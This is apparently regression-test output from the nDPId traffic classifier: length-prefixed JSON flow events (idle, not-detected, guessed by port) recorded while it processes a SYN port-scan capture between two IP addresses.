-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 